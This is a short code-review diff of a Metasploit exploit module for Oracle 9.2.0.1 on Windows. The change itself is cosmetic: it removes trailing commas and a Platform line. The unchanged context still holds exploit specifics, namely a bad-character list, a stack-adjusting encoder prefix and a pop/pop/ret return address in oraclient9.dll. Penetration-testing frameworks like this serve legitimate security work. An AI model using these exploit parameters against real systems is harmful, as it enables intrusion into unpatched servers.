@@ -30,21 +30,20 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
         ],
         'DefaultOptions' => {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
         'Privileged' => true,
         'Payload' => {
           'Space' => 800,
           'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
-          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
+          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"
         },
-        'Platform' => %w{win},
         'Targets' => [
           [
             'Oracle 9.2.0.1 Universal',
             {
               'Platform' => 'win',
-              'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
+              'Ret' => 0x60616d46 # oraclient9.dll (pop/pop/ret)
             },
           ],
         ],
